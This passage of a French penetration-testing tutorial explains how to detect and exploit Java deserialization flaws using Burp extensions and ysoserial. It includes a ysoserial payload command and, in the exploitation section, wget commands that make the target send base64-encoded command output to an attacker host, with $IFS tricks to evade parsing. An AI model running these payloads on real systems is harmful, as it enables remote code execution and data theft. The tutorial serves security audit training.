Parfois, les objets s\u00e9rialis\u00e9s sont en plus encod\u00e9s en base64, la s\u00e9quence <i>0xAC ED<\/i> devient alors <i>rO0<\/i><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><b>Chercher des noms de classes Java<\/b> dans les transactions, tels que <i>java.rmi.dgc.Lease<\/i>.\n<ul>\n<li>Dans certains cas, les noms de classe Java peuvent appara\u00eetre dans un autre format commen\u00e7ant par un \u00ab <b>L<\/b> \u00bb, se terminant par un \u00ab <b>;<\/b> \u00bb et utilisant des barres obliques pour s\u00e9parer les parties de l&#8217;espace de noms et le nom de la classe (par exemple, &#8220;<i>Ljava \/ rmi \/ dgc \/ VMID;&#8221;<\/i>).<\/li>\n<li>En raison de la sp\u00e9cification du format de s\u00e9rialisation, d&#8217;autres cha\u00eenes peuvent \u00eatre pr\u00e9sentes, telles que &#8220;<b>sr<\/b>&#8221; pouvant repr\u00e9senter un objet (TC_OBJECT) suivi de sa description de classe (TC_CLASSDESC) ou &#8220;<b>xp<\/b>&#8221; pouvant indiquer la fin des annotations de classe, (TC_ENDBLOCKDATA) pour une classe qui n&#8217;a pas de super classe (TC_NULL).<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><b>Chercher l&#8217;ent\u00eate\u00a0Content-Type\u00a0<\/b>suivant : application\/x-java-serialized-object<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Apr\u00e8s avoir identifi\u00e9 l&#8217;utilisation de donn\u00e9es s\u00e9rialis\u00e9es, il faut <b>identifier l\u2019offset dans ces donn\u00e9es o\u00f9 il est possible d\u2019injecter une charge utile<\/b>.<\/div>\n<div style=\"text-align: justify;\">La cible doit appeler <i>ObjectInputStream.readObject<\/i> pour d\u00e9s\u00e9rialiser et instancier un objet. Toutefois, elle peut appeler d&#8217;autres m\u00e9thodes de <i>ObjectInputStream<\/i>, telles que <i>readInt <\/i>qui lira simplement un entier \u00e0 4 octets dans le stream. La m\u00e9thode <i>readObject <\/i>lit les types de contenu suivants \u00e0 partir d&#8217;un flux de s\u00e9rialisation :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>0x70 \u2013 TC_NULL<\/li>\n<li>0x71 \u2013 TC_REFERENCE<\/li>\n<li>0x72 \u2013 TC_CLASSDESC<\/li>\n<li>0x73 \u2013 TC_OBJECT<\/li>\n<li>0x74 \u2013 TC_STRING<\/li>\n<li>0x75 \u2013 TC_ARRAY<\/li>\n<li>0x76 \u2013 TC_CLASS<\/li>\n<li>0x7B \u2013 TC_EXCEPTION<\/li>\n<li>0x7C \u2013 TC_LONGSTRING<\/li>\n<li>0x7D \u2013 TC_PROXYCLASSDESC<\/li>\n<li>0x7E \u2013 TC_ENUM<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Dans les cas les plus simples, la premi\u00e8re chose lue dans le flux de s\u00e9rialisation est directement l\u2019objet \u00e0 d\u00e9s\u00e9rialiser, et nous pouvons donc ins\u00e9rer notre charge directement apr\u00e8s l&#8217;en-t\u00eate de s\u00e9rialisation \u00e0 4 octets.<\/div>\n<div style=\"text-align: justify;\">Nous pouvons identifier ces cas en regardant les cinq premiers octets du flux de s\u00e9rialisation. <b>Si ces cinq octets sont un en-t\u00eate de s\u00e9rialisation \u00e0 quatre octets<\/b> (0xAC ED 00 05) <b>suivi d&#8217;une des valeurs r\u00e9pertori\u00e9es ci-dessus<\/b>, nous pouvons attaquer la cible en envoyant notre propre en-t\u00eate de s\u00e9rialisation \u00e0 quatre octets suivis d&#8217;un objet malveillant (la charge).<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Dans d&#8217;autres cas, l&#8217;en-t\u00eate de s\u00e9rialisation \u00e0 quatre octets sera <b>probablement suivi d&#8217;un \u00e9l\u00e9ment TC_BLOCKDATA<\/b> (0x77) <b>ou d&#8217;un \u00e9l\u00e9ment TC_BLOCKDATALONG<\/b> (0x7A). Le premier consiste en un unique octet suivi des donn\u00e9es de bloc et le second consiste en quatre octets suivi des donn\u00e9es de bloc.<\/div>\n<div style=\"text-align: justify;\">Si les donn\u00e9es sont suivies de l&#8217;un des types d&#8217;\u00e9l\u00e9ment pris en charge par <i>readObject<\/i>, nous pouvons alors injecter une charge utile apr\u00e8s les donn\u00e9es de bloc.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Nick Bloor a \u00e9crit un outil, <b><a href=\"https:\/\/github.com\/NickstaDB\/SerializationDumper\" target=\"_blank\" rel=\"noopener\">SerializationDumper<\/a><\/b>, qui permet de faciliter cette analyse. Voici un exemple d\u2019utilisation :<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15736 media-15736\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15736 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I4.png\" alt=\"\" width=\"574\" height=\"198\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I4.png 574w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I4-437x151.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I4-71x24.png 71w\" sizes=\"auto, (max-width: 574px) 100vw, 574px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<\/div>\n<div style=\"text-align: justify;\">Dans cet exemple, le flux contient un TC_BLOCKDATA suivi d&#8217;un TC_STRING qui peut \u00eatre remplac\u00e9 par une charge utile.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h3>M\u00e9thode 2 : Automatiquement pour plus d&#8217;exhaustivit\u00e9<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">Pour d\u00e9tecter des fonctions utilisant la d\u00e9s\u00e9rialisation de fa\u00e7on <b>automatis\u00e9e<\/b>, il est aussi possible d\u2019utiliser l\u2019extension <b><a href=\"https:\/\/github.com\/federicodotta\/Java-Deserialization-Scanner\/\" target=\"_blank\" rel=\"noopener\">Burp Java Deserialization Scanner<\/a><\/b>\u00a0en tant que scanner passif, scanner actif, ou pour tester une fonction pr\u00e9cise.<\/div>\n<div style=\"text-align: justify;\">Les librairies vuln\u00e9rables actuellement prises en charge par l\u2019outil sont :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>Apache Commons Collections 3 (up to 3.2.1)<\/li>\n<li>Apache Commons Collections 4 (up to 4.4.0)<\/li>\n<li>Spring (up to 4.2.2)<\/li>\n<li>Java 6 and Java 7 (up to Jdk7u21)<\/li>\n<li>Hibernate 5<\/li>\n<li>JSON<\/li>\n<li>Rome<\/li>\n<li>Java 8 (up to Jdk8u20)<\/li>\n<li>Apache Commons BeanUtils<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Pour utiliser la fonction de scanner passif ou actif, il suffit d\u2019aller dans l\u2019onglet correspondant de Burp et attendre l\u2019apparition d\u2019\u00e9ventuelles vuln\u00e9rabilit\u00e9s :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15738 media-15738\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15738 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I5.png\" alt=\"\" width=\"640\" height=\"293\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I5.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I5-417x191.png 417w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I5-71x33.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">Pour tester une fonction pr\u00e9cise, il faut dans un premier temps intercepter une requ\u00eate dans Burp, puis r\u00e9aliser un clic droit et l\u2019envoyer \u00e0 Java DS :<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15740 media-15740\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15740 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I6.png\" alt=\"\" width=\"400\" height=\"290\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I6.png 400w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I6-263x191.png 263w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I6-54x39.png 54w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">\n<p>L\u2019outil permet de d\u00e9terminer les charges utiles (gadgets) qui semblent fonctionner, donc de deviner les librairies utilis\u00e9es par l\u2019application pour la d\u00e9s\u00e9rialisation:<\/p>\n<figure id=\"post-15742 media-15742\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15742 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7.png\" alt=\"\" width=\"640\" height=\"371\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7-329x191.png 329w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7-67x39.png 67w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I7-120x70.png 120w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>A noter<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">Le plug-in <b>Java DS<\/b> repose sur un outil int\u00e9gr\u00e9 de g\u00e9n\u00e9ration de charges utiles (gadgets) open source : <b>ysoserial<\/b>. Il est pr\u00e9f\u00e9rable d\u2019utiliser la derni\u00e8re version de l\u2019outil, car elle inclut les types de charge les plus r\u00e9cents en fonction des vuln\u00e9rabilit\u00e9s d\u00e9couvertes sur les librairies de s\u00e9rialisation.<\/div>\n<div style=\"text-align: justify;\">Une fois le projet cr\u00e9\u00e9, n\u2019oubliez donc pas de modifier le plug-in Java DS pour qu&#8217;il pointe vers le fichier jar <b>ysoserial <\/b>que vous aurez pr\u00e9alablement t\u00e9l\u00e9charg\u00e9 :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15744 media-15744\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15744 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I8.png\" alt=\"\" width=\"640\" height=\"194\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I8.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I8-437x132.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I8-71x22.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">\n<h2>Attaquer les fonctions utilisant la d\u00e9s\u00e9rialisation<\/h2>\n<\/div>\n<div style=\"text-align: justify;\">La fonction de d\u00e9s\u00e9rialisation utilis\u00e9e par l\u2019application peut :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>\u00catre \u00e9crite et red\u00e9finie sp\u00e9cifiquement dans la classe de l\u2019objet \u00e0 d\u00e9s\u00e9rialiser (override de la m\u00e9thode <i>readObject<\/i>)<\/li>\n<li>\u00catre appel\u00e9e dans une biblioth\u00e8que externe, la plus connue \u00e9tant Apache Commons Collections (fonction <i>Utils<\/i>.<i>DeserializeFromFile<\/i>)<\/li>\n<li>De nombreuses autres possibilit\u00e9s existent : m\u00e9thode <i>readResolve<\/i>, m\u00e9thode <i>readExternal<\/i>, m\u00e9thode <i>readUnshared<\/i>, biblioth\u00e8que <i>XStream<\/i>, etc.<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">L\u2019outil <b>Java Deserialization Scanner<\/b> aura permis d\u2019identifier la librairie utilis\u00e9e. La prochaine \u00e9tape est donc de g\u00e9n\u00e9rer la charge utile (gadget) correspondant \u00e0 la librairie en question.<\/div>\n<div style=\"text-align: justify;\">Pour cela il existe 3 possibilit\u00e9s :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>G\u00e9n\u00e9rer un payload avec ysoserial puis l\u2019envoyer au serveur<\/li>\n<li>Utiliser l\u2019extension Burp Java Deserialization Scanner<\/li>\n<li>Utiliser l\u2019extension Burp Java Serial Killer<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h3>M\u00e9thode 1 : YSoSerial<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">L&#8217;une des vuln\u00e9rabilit\u00e9s les plus importantes li\u00e9e \u00e0 la d\u00e9s\u00e9rialisation a \u00e9t\u00e9 d\u00e9couverte dans la biblioth\u00e8que <b>Apache Commons Collections<\/b>.<\/div>\n<div style=\"text-align: justify;\">Si une version vuln\u00e9rable de cette biblioth\u00e8que (ou d\u2019une autre biblioth\u00e8que vuln\u00e9rable) est pr\u00e9sente sur le syst\u00e8me ex\u00e9cutant l&#8217;application utilisant la d\u00e9s\u00e9rialisation, cette vuln\u00e9rabilit\u00e9 peut entra\u00eener l&#8217;<b>ex\u00e9cution de code \u00e0 distance<\/b>.<\/div>\n<div style=\"text-align: justify;\">Afin d&#8217;exploiter cette vuln\u00e9rabilit\u00e9, il est possible d\u2019utiliser l&#8217;outil <b>ysoserial<\/b>, qui contient une collection d&#8217;exploits et permet de g\u00e9n\u00e9rer des objets s\u00e9rialis\u00e9s malveillants qui ex\u00e9cuteront des commandes lors de la d\u00e9s\u00e9rialisation.<\/div>\n<div style=\"text-align: justify;\">Il est juste n\u00e9cessaire de sp\u00e9cifier la biblioth\u00e8que vuln\u00e9rable. Voici un exemple pour Windows :<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">java -jar ysoserial-master.jar CommonsCollections5 calc.exe &gt; wave.stone<\/span><\/div>\n<div style=\"text-align: justify;\">Cela g\u00e9n\u00e9rera un objet s\u00e9rialis\u00e9 (fichier wave.stone) pour la biblioth\u00e8que vuln\u00e9rable <b>Apache Commons Collections<\/b> et l&#8217;exploit ex\u00e9cutera la commande \u00ab <b>calc.exe<\/b> \u00bb.<\/div>\n<div style=\"text-align: justify;\">Si le code suivant est pr\u00e9sent c\u00f4t\u00e9 serveur :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"w-code\"><span class=\"sc11\">LogFile<\/span> <span class=\"sc11\">objet<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">LogFile<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">String<\/span> <span class=\"sc11\">file<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc6\">&#8220;wave.stone&#8221;<\/span><span class=\"sc10\">;<\/span><\/span><\/span><span class=\"w-code\"><span class=\"sc2\">\/\/ D\u00e9s\u00e9rialisation de l\u2019objet<br \/>\n<\/span><span class=\"sc11\">objet<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc10\">(<\/span><span class=\"sc11\">LogFile<\/span><span class=\"sc10\">)<\/span><span class=\"sc11\">Utils<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">DeserializeFromFile<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">file<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Alors apr\u00e8s envoi de la charge malveillante au serveur (via <b>Burp<\/b>), l\u2019output c\u00f4t\u00e9 serveur sera le suivant :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">Deserializing from wave.stone<br \/>\n<span class=\"w-grepped\">Exception in thread &#8220;main&#8221; java.lang.ClassCastException:<br \/>\njava.management\/javax.management.BadAttributeValueExpException<br \/>\ncannot be cast to LogFile at LogFiles.main(LogFiles.java:105)<\/span><br \/>\n<\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Et le r\u00e9sultat sur le serveur sera l\u2019ex\u00e9cution de calc.exe :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15746 media-15746\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15746 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I9.png\" alt=\"\" width=\"326\" height=\"502\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I9.png 326w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I9-124x191.png 124w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I9-25x39.png 25w\" sizes=\"auto, (max-width: 326px) 100vw, 326px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>M\u00e9thode 2 : Java DS<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">\u00c0 la suite de la <b>phase de d\u00e9tection<\/b>, nous savons qu\u2019une charge utile (gadget) forg\u00e9 pour <b>CommonsCollections1<\/b> fonctionne contre notre cible.<\/div>\n<div style=\"text-align: justify;\">En acc\u00e9dant \u00e0 l\u2019onglet \u00ab <b>Exploiting <\/b>\u00bb de Java DS, il est possible de cr\u00e9er et d\u2019envoyer nos propres charges utiles.<\/div>\n<div style=\"text-align: justify;\">Par exemple, pour tenter de lancer la commande <i>uname -a<\/i> sur le syst\u00e8me Unix distant (si c\u2019est un Unix) on entrera la commande suivante :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15748 media-15748\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15748 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I10.png\" alt=\"\" width=\"640\" height=\"479\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I10.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I10-255x191.png 255w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I10-52x39.png 52w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">Le serveur renvoie ici un autre objet s\u00e9rialis\u00e9 en r\u00e9ponse, ce qui ne nous permet absolument pas de savoir si notre commande a r\u00e9ussi ou pas, ni d\u2019avoir sa sortie.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15750 media-15750\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15750 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11.png\" alt=\"\" width=\"640\" height=\"496\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11-246x191.png 246w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11-50x39.png 50w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11-156x121.png 156w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I11-155x120.png 155w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">Une technique permettant de valider l&#8217;ex\u00e9cution r\u00e9ussie de nos commandes consiste \u00e0 utiliser un canal auxiliaire bas\u00e9 sur le temps : En <b>mettant en pause le processus en cours d\u2019ex\u00e9cution avec la commande Java Sleep<\/b>, nous pouvons <b>d\u00e9montrer avec certitude que l\u2019application est vuln\u00e9rable en mesurant le temps de r\u00e9ponse du serveur<\/b>.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Une charge utile bas\u00e9e sur la mise en pause du processus est donc suffisante pour identifier la vuln\u00e9rabilit\u00e9, mais si vous avez le temps et voulez aller encore plus loin, il est <b>possible de r\u00e9cup\u00e9rer cette sortie<\/b> en d\u00e9ployant un serveur web sur votre machine, et en requ\u00eatant votre serveur web depuis le serveur cible.<\/div>\n<div style=\"text-align: justify;\">Pour cela, sur votre machine d\u2019audit, commencez par d\u00e9ployer un serveur web :<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">python -m SimpleHTTPServer 80<\/span><\/div>\n<div><\/div>\n<div style=\"text-align: justify;\">Et l\u2019objectif va \u00eatre de faire ex\u00e9cuter cette commande au serveur cible :<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">wget <span class=\"w-grepped\">ip_attaquant<\/span>\/`uname -a | base64`<\/span><\/div>\n<div><\/div>\n<div style=\"text-align: justify;\">L\u2019exploit de Apache Commons Collections fait transmettre notre commande \u00e0 Apache Commons <b>exec<\/b>.<\/div>\n<div style=\"text-align: justify;\">Par cons\u00e9quent, les commandes sont invoqu\u00e9es sans avoir de shell parent, ce qui limite rapidement les actions\u2026 Mais on peut appeler un shell <b>bash <\/b>via Apache Commons <b>exec <\/b>via la commande <b>bash -c<\/b>.<\/div>\n<div style=\"text-align: justify;\">Toutefois, Apache Commons exec parse les commandes en g\u00e9rant tr\u00e8s mal les espaces&#8230; Pour r\u00e9soudre ce probl\u00e8me, on peut utiliser 2 approches :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>Utiliser les fonctions de manipulation de cha\u00eene en bash. Par exemple, cette commande charge le r\u00e9sultat en base64 de la commande echo yoloswag dans la variable c, qui est ensuite ajout\u00e9e au chemin de la requ\u00eate wget :<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">bash -c c=`{echo,yoloswag}|base64`&amp;&amp;{wget,<span class=\"w-grepped\">ip_attaquant<\/span>\/$c}&#8217;<\/span><\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>Il est aussi possible d\u2019utiliser la variable $IFS (s\u00e9parateur de champs interne) \u00e0 la place des espaces dans la commande transmise \u00e0 Bash. Ici pour lancer un uname -a :<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">bash \u2013c wget$IFS<span class=\"w-grepped\">ip_attaquant<\/span>\/`uname$IFS-a|base64`<\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Dernier point important : il peut \u00eatre n\u00e9cessaire d\u2019\u00e9chapper les barres obliques et les signes dollar dans certaines situations, tout d\u00e9pend de la charge utile et des fonctions touch\u00e9es.<\/div>\n<div style=\"text-align: justify;\">Ici, avec une machine d\u2019audit ayant pour IP 54.161.175.139 :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15752 media-15752\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15752 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12.png\" alt=\"\" width=\"640\" height=\"374\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-327x191.png 327w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-67x39.png 67w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-120x70.png 120w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">Le r\u00e9sultat c\u00f4t\u00e9 serveur web sur la machine d\u2019audit est le suivant :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15760 media-15760\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15760 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-bis.png\" alt=\"\" width=\"640\" height=\"32\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-bis.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-bis-437x22.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-bis-71x4.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<\/div>\n<div style=\"text-align: justify;\">Une requ\u00eate depuis l\u2019IP du serveur cible appara\u00eet, vers une URL encod\u00e9e en base64 et qui correspond \u00e0 la sortie de la commande \u00ab <b>uname -a<\/b> \u00bb.<\/div>\n<div style=\"text-align: justify;\">En effet, apr\u00e8s une extraction de la donn\u00e9e et son d\u00e9codage base64 par la commande suivante :<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">tail -n1 access.log | cut -d\/ -f4 | cut \u2018d\u2019\u2019 -f1 | base64 -d<\/span><\/div>\n<div><\/div>\n<div style=\"text-align: justify;\">Le r\u00e9sultat suivant appara\u00eet :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15762 media-15762\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15762 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-ter.png\" alt=\"\" width=\"640\" height=\"29\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-ter.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-ter-437x20.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I12-ter-71x3.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<\/div>\n<div style=\"text-align: justify;\">Vous avez donc ex\u00e9cut\u00e9 une commande <b>uname -a<\/b> avec succ\u00e8s sur le serveur cible : vous \u00eates d\u00e9sormais un serial hacker accompli !<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15754 media-15754\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15754 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13.jpg\" alt=\"\" width=\"320\" height=\"212\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13.jpg 320w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-288x191.jpg 288w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-59x39.jpg 59w\" sizes=\"auto, (max-width: 320px) 100vw, 320px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<div style=\"text-align: center;\"><i><span style=\"font-size: x-small;\">Le ma\u00eetre deserializateur veut vous serrer la main<\/span><\/i><\/div>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>M\u00e9thode 3 : Java Serial Killer<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">\u00c0 la suite de la <b>phase de d\u00e9tection<\/b>, nous savons qu\u2019une charge utile (gadget) forg\u00e9 pour <b>CommonsCollections1 <\/b>fonctionne contre notre cible.<\/div>\n<div style=\"text-align: justify;\">Vous pouvez alors utiliser l\u2019extension Burp <b>Java Serial Killer<\/b> ; un clic-droit sur une requ\u00eate POST contenant un objet Java s\u00e9rialis\u00e9 dans le body permet de l\u2019envoyer \u00e0 l\u2019extension :<\/div>\n<div 